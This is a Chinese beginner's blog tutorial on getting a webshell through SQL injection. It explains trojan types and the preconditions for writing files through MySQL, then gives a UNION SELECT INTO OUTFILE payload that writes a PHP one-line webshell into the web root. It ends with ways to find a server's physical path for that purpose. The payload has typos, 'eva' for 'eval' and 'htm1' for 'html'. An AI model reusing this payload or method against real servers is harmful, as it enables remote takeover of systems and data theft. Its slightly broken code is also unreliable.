【新手入门】SQL注入之getshell(木马)

木马介绍

木马其实就是一段程序,这个程序运行到目标主机上时,主要可以对目标进行远程控制、盗取信息等功能,一般不会破坏目标主机,当然,这也看黑客是否想要搞破坏。

按照功能分类:远控型、破坏型、流氓软件型、盗取信息型等等

按照连接方式分类:正向连接、反向连接、无连接等

按照功能大小分类:大马、小马、一句话木马

这里我们简单说一下php的一句话木马,然后通过sql注入将一句话木马写入目标服务器,再通过木马利用工具连接木马程序从而达到控制目标主机的效果。

通过注入点写入木马程序的前提条件

1.mysql开启了secure_file_priv=" "的配置.

2.知道了网站代码的真实物理路径.

3.物理路径具备写入权限.

4.最好是root用户,这个条件非必须,但是有最好.

通过注入点写入木马程序

' union select "<?php @eva($_POST[' jaden']);?>",2 into outfile "c:\\phpstudyPHPTutorial\\www\ljaden.php"+--+

获得后台真实物理路径的方法

1.收集站点敏感目录,比如phpinfo.php探针文件是否可以访问到

2.站点网址输入一些不存在的网址 或者加一些非法参数数据,让网站报错,看错误信息中是否存在路径信息

3.指纹信息收集

nginx默认站点目录:/usr/share/nginx/htm1,配置文件路径:/etc/nginx/nginx.conf

apache默认站点目录:/var/www/htm1

4.通过站点其他漏洞来获取配置信息、真实物理路径信息,比如如果发现远程命令执行漏洞,针对php的站点,直接执行一个phpinfo()函数,可以看到phpinfo.php所展示的各种信息等等。

相关推荐
灵感__idea3 小时前
JavaScript高级程序设计(第5版):好的编程就是掌控感
前端·javascript·程序员
-SGlow-4 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
烛阴4 小时前
Mix
前端·webgl
代码续发5 小时前
前端组件梳理
前端
明月5665 小时前
Oracle 误删数据恢复
数据库·oracle
试图让你心动5 小时前
原生input添加删除图标类似vue里面移入显示删除[jquery]
前端·vue.js·jquery
陈不知代码6 小时前
uniapp创建vue3+ts+pinia+sass项目
前端·uni-app·sass
小王码农记6 小时前
sass中@mixin与 @include
前端·sass
陈琦鹏6 小时前
轻松管理 WebSocket 连接!easy-websocket-client
前端·vue.js·websocket
hui函数6 小时前
掌握JavaScript函数封装与作用域
前端·javascript